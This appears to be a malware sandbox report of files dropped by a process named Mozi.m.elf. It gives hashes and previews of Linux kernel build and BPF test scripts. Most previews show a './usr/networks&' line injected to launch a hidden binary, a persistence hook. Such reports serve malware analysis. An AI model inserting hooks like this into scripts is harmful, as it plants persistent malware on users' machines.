                                                              SHA-512:D8754FA4D1EFEC8C9E04A9956B8DBB34052EEE4609FF58B05A83048351236EF3A1FA2B10052E16B203159044A681A60E0F28B69158159506FAC60F1855DDA006
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}...export MTOOLSRC=$4.FIMAGE=$2.FBZIMAGE=$3.KCMDLINE=$5.FDINITRD=$6..# Make sure the files actually exist.verify "$FBZIMAGE"..genbzdisk() {..verify "$MTOOLSRC"..mformat a:..syslinux $FIMAGE..echo "$KCMDLINE" | mcopy - a:syslinux.cfg..if [ -f "$FDINITRD" ] ; then...mcopy "$FDINITRD" a:initrd.img..fi..mcopy $FBZIMAGE a:linux.}..genfdimage144() {..verify "$MTOOLSRC"..dd if=/dev/zero of=$FIMAGE bs=1024 count=1440 2> /dev/null..mformat v:..syslinux $FIMAGE..echo "$KCMDLINE" | mcopy - v:syslinux.cfg..if [ -f "$FDINITRD" ] ; then...mcopy "$FDINITRD" v:initrd.img..fi..mcopy $FBZIMAGE v:linux.}..genfdimage288() {..verify "$MTOOLSRC"..dd if=/dev/zero of=$FIMAGE bs=1024 count=2880 2> /dev/null..mformat w:..syslinux $FIMAGE..echo "$KCMDLINE" | mcopy - W:syslinux.cfg..if [ -f "$FDINITRD" ] ; then...mcopy "$FDINITRD" w:initrd.img..fi..mcopy $FBZIMAGE w:linux.}..geniso() {..tmp_dir=`dirname $FIMAGE`/isoimage..rm -rf $tmp_dir..mkdir $tmp_dir..for i in lib lib64 share ; do
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):678
                                                              Entropy (8bit):5.067077678929959
                                                              Encrypted:false
                                                              SSDEEP:12:cngSwa2h12l3mGnHFMyHFt9n2M2V/b3PBLmxgeHZENTn:Mt2+nKyr92M2lNLqVHZ4T
                                                              MD5:1650FEC48B0B1EBD4FAB411DD00598B5
                                                              SHA1:86D56762CA9C2B7C28AC12C563D77C67C02D0C81
                                                              SHA-256:62AB216A96E77FC77955522C9F955D9CD9828143F49EE9FCBF6724733A9CE5EC
                                                              SHA-512:16D867913A12644B56649640BA282C6B085484BC62F4B63A1EC038C0E69F782D283AF4A6DE89305FBD5798319E08B9BCDCB0DCCF83E43DA1C48167F703666B38
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1. .fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map..if [ -x /sbin/lilo ]; then. /sbin/lilo.elif [ -x /etc/lilo/install ]; then. /etc/lilo/install.else. sync. echo "Cannot find LILO.".fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):115
                                                              Entropy (8bit):4.352261167967631
                                                              Encrypted:false
                                                              SSDEEP:3:qXVxJjVvqJehDIAtQhLMWZKeKeBHvrjUv6viXVOORgn:aJQJRAiBIeHTov6viMn
                                                              MD5:CF0DF14B2542B49CC430815F52210FB2
                                                              SHA1:57F85D438B7B483317A0369336E7FAE77F416B94
                                                              SHA-256:AE1F21EF3B288AC922174882D038556FC6FFAA23B297ACE426CC43F610978757
                                                              SHA-512:3A844C13254D17FC86BA21CF13F63EDF3EF081520C2A5BFDD77DAED6B3CB3B022730A391F481D4C4B315A7152C7E36A2357F4A6A426813ADDA0FE3E249947913
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 0.else. echo "$file: undefined symbols found" >&2. exit 1.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):115
                                                              Entropy (8bit):4.352261167967631
                                                              Encrypted:false
                                                              SSDEEP:3:qXVxJjVvqJehDIAtQhLMWZKeKeBHvrjUv6viXVOORgn:aJQJRAiBIeHTov6viMn
                                                              MD5:CF0DF14B2542B49CC430815F52210FB2
                                                              SHA1:57F85D438B7B483317A0369336E7FAE77F416B94
                                                              SHA-256:AE1F21EF3B288AC922174882D038556FC6FFAA23B297ACE426CC43F610978757
                                                              SHA-512:3A844C13254D17FC86BA21CF13F63EDF3EF081520C2A5BFDD77DAED6B3CB3B022730A391F481D4C4B315A7152C7E36A2357F4A6A426813ADDA0FE3E249947913
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 0.else. echo "$file: undefined symbols found" >&2. exit 1.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1309
                                                              Entropy (8bit):5.19940988754545
                                                              Encrypted:false
                                                              SSDEEP:24:My4uj9Gzr0DOiw3AYsRH8MADesj2RzvE1JH5sp9sIP64z4l0nFF:Mkj9GzYDOigw9ADesgvEzSp97PalA
                                                              MD5:4F84B987098D1285BF6883064BB35500
                                                              SHA1:070B6DDCCB31680A2D55FE186C01AAEF36ED3948
                                                              SHA-256:9CFAE1F5C0A3948E2B79FC6F22BC03E767E278AC8CC509DF9C30F93030C2CD82
                                                              SHA-512:39CE6F8F2F12EF0303F5CB51AABB5547E724718EC426DCCD2148353FB95AA3EB2CAE471F718FBEAFC50DFE821A125028D026E1ED43799DA20386DD35D7E97B6F
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit.fi..if [ "${quiet}" != "silent_" ]; then. echo " GEN $tarfile".fi..rm -rf $cpio_dir.mkdir $cpio_dir..if [ "$building_out_of_srctree" ]; then..(...cd $srctree...for f in $dir_list....do find "$f" -name "*.h";...done | cpio --quiet -pd $cpio_dir..).fi..# The second CPIO can complain if files already exist which can happen with out.# of tree builds having stale headers in srctree. Just silence CPIO for now..for f in $dir_list;..do find "$f" -name "*.h";.done | cpio --quiet -pd $cpio_dir >/dev/null 2>&1..# Remove comments except SDPX lines.find $cpio_dir -type f -print0 |..xargs -0 -P8 -n1 perl -pi -e 'BEGIN {undef $/;}; s/\/\*((?!SPDX).)*?\*\///smg;'..# Create archive and try to normalize metadata for reproducibility..# For compatibility with older versions of tar, files are fed to tar.# pre-sorted, as --sort=name might not be available..find $cpio_dir -printf "./%P\n" | LC_ALL=C sort | \. tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):8519
                                                              Entropy (8bit):5.010306696162023
                                                              Encrypted:false
                                                              SSDEEP:192:n1IITVpEGos8UG+yFpA0H+QZGBCGrRGGqHmH3:n1XEBFyNqGH3
                                                              MD5:39A54EDD0B48437669EF466EF38B47B7
                                                              SHA1:B5C5EC2852F2D24B5F9BDAFD7B7E3BE667BF41D5
                                                              SHA-256:795F45745B5B13BB0963162F8234FD5030286DC8952167363B62E3622FDA395D
                                                              SHA-512:749FC804D827FB207B40E98F6B57456F8DE65218026DE106DEEB6797A5344AC35EDB4F01B6C32F9AB8F9E2317B39E9149CA0D6986B095477EC17BCCD7585B6FE
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit.}..#set -x..debug_flag=0.args="$@".name="$0".netem=0.cc=x.dir="-o".dir_name="out".dur=5.flows=1.id=1.prog="".port=5201.rate=1000.multi_iperf=0.flow_cnt=1.use_netperf=0.rr=0.ecn=0.details=0.server="".qdisc="".flags="".do_stats=0..function start_hbm () {. rm -f hbm.out. echo "./hbm $dir -n $id -r $rate -t $dur $flags $dbg $prog" > hbm.out. echo " " >> hbm.out. ./hbm $dir -n $id -r $rate -t $dur $flags $dbg $prog >> hbm.out 2>&1 &. echo $!.}..processArgs () {. for i in $args ; do. case $i in. # Support for upcomming ingress rate limiting. #in) # support for upcoming ingress rate limiting. # dir="-i". # dir_name="in". # ;;. out). dir="-o". dir_name="out". ;;. -b=*|--bpf=*). prog="${i#*=}". ;;. -c=*|--cc=*). cc="${i#*=}". ;;. --no_cn). flags="$flags --no_cn". ;;. --debug). flags="$flags -d". debug_flag=1. ;;. -d=*|--delay=*). netem="${i#*=}". ;;.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46
                                                              Entropy (8bit):3.925523369006428
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                              MD5:2CADDA792FBD37B54978108B6CC504D4
                                                              SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                              SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                              SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):260
                                                              Entropy (8bit):4.984871849319041
                                                              Encrypted:false
                                                              SSDEEP:6:EYIACMVZ/XVpOGd3sC2FKILoYv++rL9jLlQhoqJp/n:EYTV9ECD2oV6L9Siq/n
                                                              MD5:916F2AEB2D17CDBE3C15DD04D58064D2
                                                              SHA1:2EC06716D522A309762BDB8C371062A414DA4895
                                                              SHA-256:3B8548872C68F17C6A38F85FE2283CBCAB60AA4C6C2CDEEB0FC909964A79DB31
                                                              SHA-512:73CB59BFD923F2A136CA186E51BCE15CC2E50685C2D3B31D91993B5E742A431A334EE605AEEAC05B202825EA28CE09361B1568369AA56E8E8180513C1160EA05
                                                              Malicious:false
                                                              Preview:./usr/networks&.on_exit() {..iptables -D OUTPUT -m bpf --object-pinned ${mnt_dir}/bpf_prog -j ACCEPT..umount ${mnt_dir}..rm -r ${mnt_dir}.}..trap on_exit EXIT.mount -t bpf bpf ${mnt_dir}../per_socket_stats_example ${mnt_dir}/bpf_prog $1../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2014
                                                              Entropy (8bit):5.0777491882953285
                                                              Encrypted:false
                                                              SSDEEP:48:VcVBnCTe9tg1eLKG9hen3qePMReBG7QnDM:1TuGQLw3h00wMM
                                                              MD5:1A19D3598CCE599D57F639332B1D85A9
                                                              SHA1:8B246E85B6225F4A9B8615E6EE4588528FCBB944
                                                              SHA-256:8B8BFE55773D8F9F48416690AB76B38C867F65C77FFDC5809BB52B0519955024
                                                              SHA-512:7FF87CC5A6C77A2FC6D03075438DEDAE85657FBDD1D040AA1E44398766622FAC9286B92B16F508127C1316D1399966B17E42F40111B6F39E1F2D10324E95EB19
                                                              Malicious:false
                                                              Preview:./usr/networks&.cleanup_and_exit().{..local rc=$1..local msg="$2"...[ -n "$msg" ] && echo "ERROR: $msg"...test_cgrp2_sock -d ${CGRP_MNT}/sockopts..ip li del cgrp2_sock..umount ${CGRP_MNT}...exit $rc.}...################################################################################.# main..rc=0..ip li add cgrp2_sock type dummy 2>/dev/null..set -e.mkdir -p ${CGRP_MNT}.mount -t cgroup2 none ${CGRP_MNT}.set +e...# make sure we have a known start point.cleanup 2>/dev/null..mkdir -p ${CGRP_MNT}/sockopts.[ $? -ne 0 ] && cleanup_and_exit 1 "Failed to create cgroup hierarchy"...# set pid into cgroup.echo $$ > ${CGRP_MNT}/sockopts/cgroup.procs..# no bpf program attached, so socket should show no settings.check_sock "dev , mark 0, priority 0" "No programs attached".check_sock6 "dev , mark 0, priority 0" "No programs attached"..# verify device is set.#.test_cgrp2_sock -b cgrp2_sock ${CGRP_MNT}/sockopts.if [ $? -ne 0 ]; then..cleanup_and_exit 1 "Failed to install program to set device".fi.check_s
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):878
                                                              Entropy (8bit):4.988531379379293
                                                              Encrypted:false
                                                              SSDEEP:12:6Kbc/bQozJutgQ0e2130J0CxTXm6v2/mMgxZNSJy6vVz/mMgOZXm6vsZ/b3SJy6Y:3cDtlU5IkJ7xTF2jgfN4VzjgOZFgz34g
                                                              MD5:FB72F29EE9AED2E8782151AA9ED02F35
                                                              SHA1:F304ABC904938063F8E8A8FB9F43FB917FE4D9D0
                                                              SHA-256:013F681368381CE28617A8615D2F5EE43146C987B167F402E5E40F7EBC48375D
                                                              SHA-512:A332F61B21057CA1F217AB4AC58BF99441EEE1855ECE15AB5A14B4D9FC15AA424745EF787C2B294EC9AF1E40F1266B4EFFE2F2C1F1C232942775CB7A5DA79418
                                                              Malicious:false
                                                              Preview:./usr/networks&..[ $? -ne 0 ] && exit 1.}..function cleanup {..if [ -d /tmp/cgroupv2/foo ]; then...test_cgrp2_sock -d /tmp/cgroupv2/foo..fi..ip link del veth0b..ip netns delete at_ns0..umount /tmp/cgroupv2..rm -rf /tmp/cgroupv2.}..cleanup 2>/dev/null..set -e.config_device.config_cgroup.set +e..#.# Test 1 - fail ping6.#.attach_bpf 0.ping -c1 -w1 172.16.1.100.if [ $? -ne 0 ]; then..echo "ping failed when it should succeed"..cleanup..exit 1.fi..ping6 -c1 -w1 2401:db00::1.if [ $? -eq 0 ]; then..echo "ping6 succeeded when it should not"..cleanup..exit 1.fi..#.# Test 2 - fail ping.#.attach_bpf 1.ping6 -c1 -w1 2401:db00::1.if [ $? -ne 0 ]; then..echo "ping6 failed when it should succeed"..cleanup..exit 1.fi..ping -c1 -w1 172.16.1.100.if [ $? -eq 0 ]; then..echo "ping succeeded when it should not"..cleanup..exit 1.fi..cleanup.echo.echo "*** PASS ***"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1601
                                                              Entropy (8bit):5.112440858569075
                                                              Encrypted:false
                                                              SSDEEP:48:pb3f9gh4igqE4d4JeVgAaoCJse7DPY8C0eM9gJUmotTM:pb3FWXCJse7DP/CxM9gDoto
                                                              MD5:D52F35BFCB630EC4EAD11A16A6F5BACA
                                                              SHA1:30B020FECA15AEC05AC60C24D787DA79FE16B91F
                                                              SHA-256:3B082D32C10238EB8DD23AD37CF26CF2229BB77ABB4EB3C24CFBF75281AE9CBE
                                                              SHA-512:86569E54CFDB6CE7428A87B9662762632004B0C21FB29280ADF73FC39903A3253B434464908F8C3B41466B07F135589E4AC3A37AF9D5F03796EAA8FC4EEED38C
                                                              Malicious:false
                                                              Preview:./usr/networks&.do_exit() {. if [ "$DEBUG" == "yes" ] && [ "$MODE" != 'cleanuponly' ]. then..echo "------ DEBUG ------"..echo "mount: "; mount | egrep '(cgroup2|bpf)'; echo..echo "$CGRP2_TC_LEAF: "; ls -l $CGRP2_TC_LEAF; echo..if [ -d "$BPF_FS_TC_SHARE" ]..then.. echo "$BPF_FS_TC_SHARE: "; ls -l $BPF_FS_TC_SHARE; echo..fi..echo "Host net:"..$IP netns..$IP link show dev $HOST_IFC..$IP -6 a show dev $HOST_IFC..$TC -s qdisc show dev $HOST_IFC..echo..echo "$NS net:"..$IP -n $NS link show dev $NS_IFC..$IP -n $NS -6 link show dev $NS_IFC..echo "------ DEBUG ------"..echo. fi.. if [ "$MODE" != 'nocleanup' ]. then..setup_net stop..setup_bpf_cgrp2_array stop..setup_cgrp2 stop. fi.}..init_cgrp2_vars.init_bpf_fs_vars..while [[ $# -ge 1 ]].do. a="$1". case $a in..debug).. DEBUG='yes'.. shift 1.. ;;..cleanup-only).. MODE='cleanuponly'.. shift 1.. ;;..no-cleanup).. MODE='nocleanup'.. shift 1.. ;;..*).. echo "test_cgrp2_tc [debug] [cleanup-only
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):6983
                                                              Entropy (8bit):5.201097453002275
                                                              Encrypted:false
                                                              SSDEEP:48:KD0zfOn/02ckJ8lSqUEc+9muBAm3kksd5EtlaC9sABgrb92EMKUP8ifWdEMKU4Ff:37KMKLqMKtFtpTiizRIK71xizKii/
                                                              MD5:141A58D030B906BCF43FB5AA470FB627
                                                              SHA1:4C321AF2417D8212EBA1901B263024A1283947E4
                                                              SHA-256:8E2800663E95C6B0059A1C2E2CFE7BA9FEFEEC47859A763164E66C3177486B1F
                                                              SHA-512:E3D6273F0F7191EC082FC984AC5463C9672CDC678965CF24EC92DBB0174D8F3835047BAFDB2F064BF58972CFC11197DC84955DD11ABFCE3217A1F1905B2C6681
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.}..function match_trace {..set +x..RET=0..TRACE=$1..EXPECT=$2..GOT="$(filter_trace "$TRACE")"...[ "$GOT" != "$EXPECT" ] && {...expect_fail "$EXPECT" "$GOT"...RET=1..}..set -x..return $RET.}..function test_start {..set +x..echo "----------------------------------------------------------------"..echo "Starting test: $*"..echo "----------------------------------------------------------------"..set -x.}..function failure {..get_trace..echo "FAIL: $*"..exit 1.}..function test_ctx_xmit {..test_start "test_ctx on lwt xmit"..install_test xmit test_ctx..ping -c 3 $IPVETH1 || {...failure "test_ctx xmit: packets are dropped"..}..match_trace "$(get_trace)" ".len 84 hash 0 protocol 8.cb 1234 ingress_ifindex 0 ifindex $DST_IFINDEX.len 84 hash 0 protocol 8.cb 1234 ingress_ifindex 0 ifindex $DST_IFINDEX.len 84 hash 0 protocol 8.cb 1234 ingress_ifindex 0 ifindex $DST_IFINDEX" || exit 1..remove_prog xmit.}..function test_ctx_out {..test_start "test_ctx on lwt out"..install_test o
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3551
                                                              Entropy (8bit):4.948896024544934
                                                              Encrypted:false
                                                              SSDEEP:48:mFiAzsLxzNr/h8zHJnAIb5wvlg4FbNyKjhQV/IzAodJwv5h0jZ+45A6xg4Ib7wQF:mbcfL5FhNThQx8AodKvEZ9Q9Qt/BIj
                                                              MD5:D4D4BCF1202D60C541E70ED9F4493153
                                                              SHA1:5DEE85412FED02349DE7E30D0B569010C150D319
                                                              SHA-256:92D4296045B4595FA148224C9D714C2AD42E293685094CC53E255B091C09BB05
                                                              SHA-512:9F72396C8437D2F6F0A2E488E90308E5B903697F7D6F0929BCB11367C53592FA949BFD329E6A9E2E6C56FC3F45E2187F22C5E9B82ADA5148150A7ECF36DC9B36
                                                              Malicious:false
                                                              Preview:./usr/networks&. local exitcode=$1. shift. echo "ERROR: $@" >&2. exit $exitcode.}..function info() {. if [[ -n "$VERBOSE" ]]; then..echo "# $@". fi.}..## -- Helper function calls --..# Wrapper call for TC and IP.# - Will display the offending command on failure.function _call_cmd() {. local cmd="$1". local allow_fail="$2". shift 2. if [[ -n "$VERBOSE" ]]; then..echo "$cmd $@". fi. if [[ -n "$DRYRUN" ]]; then..return. fi. $cmd "$@". local status=$?. if (( $status != 0 )); then..if [[ "$allow_fail" == "" ]]; then.. err 2 "Exec error($status) occurred cmd: \"$cmd $@\""..fi. fi.}.function call_tc() {. _call_cmd "$TC" "" "$@".}.function call_tc_allow_fail() {. _call_cmd "$TC" "allow_fail" "$@".}.function call_ip() {. _call_cmd "$IP" "" "$@".}..## --- Parse command line arguments / parameters ---.# Using external program "getopt" to get --long-options.OPTIONS=$(getopt -o vfhd: \. --long verbose,flush,help,list,dev:,dry-run --
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4783
                                                              Entropy (8bit):4.983372019940084
                                                              Encrypted:false
                                                              SSDEEP:96:9omCAr3I1KvvrbWK2By9bg28z6qBYXtCt+xN/xWa0GhNYu:SmJ3oKTiK2E9828z6SYdy+xya0Ggu
                                                              MD5:A6274A52DC1BB7FEF3DB950BF932947A
                                                              SHA1:09DF623D0F179F1E20B5D02E97687C8AFDA9F0A0
                                                              SHA-256:6F042311F9C18CBD7A482F06512FC2EAC503EDD1DF4796D2131850E204416720
                                                              SHA-512:F442A44D8B96786D3E027E32B1233DE4F0F1A1E229809BB108FF4A9A55647225FA0491005A650091CE14A82EA911A0B3C675988FE9BD082CE4FE1FFF792F2671
                                                              Malicious:false
                                                              Preview:./usr/networks&.set -o errexit..## -- General shell logging cmds --.function err() {. local exitcode=$1. shift. echo "ERROR: $@" >&2. exit $exitcode.}..function warn() {. echo "WARN : $@" >&2.}..function info() {. if [[ -n "$VERBOSE" ]]; then..echo "INFO : $@" >&2. fi.}..## -- Pktgen proc config commands -- ##.export PROC_DIR=/proc/net/pktgen.#.# Three different shell functions for configuring the different.# components of pktgen:.# pg_ctrl(), pg_thread() and pg_set()..#.# These functions correspond to pktgens different components..# * pg_ctrl() control "pgctrl" (/proc/net/pktgen/pgctrl).# * pg_thread() control the kernel threads and binding to devices.# * pg_set() control setup of individual devices.function pg_ctrl() {. local proc_file="pgctrl". proc_cmd ${proc_file} "$@".}..function pg_thread() {. local thread=$1. local proc_file="kpktgend_${thread}". shift. proc_cmd ${proc_file} "$@".}..function pg_set() {. local dev=$1. local pro
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2377
                                                              Entropy (8bit):5.214228688457712
                                                              Encrypted:false
                                                              SSDEEP:48:ZfG/4iToV7FBjBCTElukgjpgf3TQE8CPkG83lU/3wUu/XQcrS8vvDMIz4:tGAiQ5lukgjpwD7qBUvcrpDMV
                                                              MD5:C3C7BFF67513E6EB03DCACBCEA896BAC
                                                              SHA1:1162DB80FBABE8E5C28B92B5C3AE757BBC667393
                                                              SHA-256:CE3FF5D793BA4F3D2B02EE96520DA1CAE56B7EF04AC7020FFD9A52F4F54B6ABC
                                                              SHA-512:030EC273B9D095616C4FB81E6B25DAD11BF62014E35638982ADA272E52F00F38976FA2CA9A63C5A152512073E22C2C25DE480C396365431F7CE285A1CAC7B173
                                                              Malicious:false
                                                              Preview:./usr/networks&.# handle_ing() but exit early).#.# config: tc qdisc add dev $SOMEDEV handle ffff: ingress.#.# (3) ingress on this dev, handle_ing() -> tc_classify().#.# config: tc qdisc add dev $DEV handle ffff: ingress.#.# (4) ingress on this dev + drop at u32 classifier/action..#.basedir=`dirname $0`.source ${basedir}/functions.sh.root_check_run_with_sudo "$@"..# Parameter parsing via include.source ${basedir}/parameters.sh.# Using invalid DST_MAC will cause the packets to get dropped in.# ip_rcv() which is part of the test.if [ -z "$DEST_IP" ]; then. [ -z "$IP6" ] && DEST_IP="198.18.0.42" || DEST_IP="FD00::1".fi.[ -z "$DST_MAC" ] && DST_MAC="90:e2:ba:ff:ff:ff".[ -z "$BURST" ] && BURST=1024.[ -z "$COUNT" ] && COUNT="10000000" # Zero means indefinitely.if [ -n "$DST_PORT" ]; then. read -r DST_MIN DST_MAX <<< $(parse_ports $DST_PORT). validate_ports $DST_MIN $DST_MAX.fi..# Base Config.DELAY="0" # Zero means max speed..# General cleanup everything since last run.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
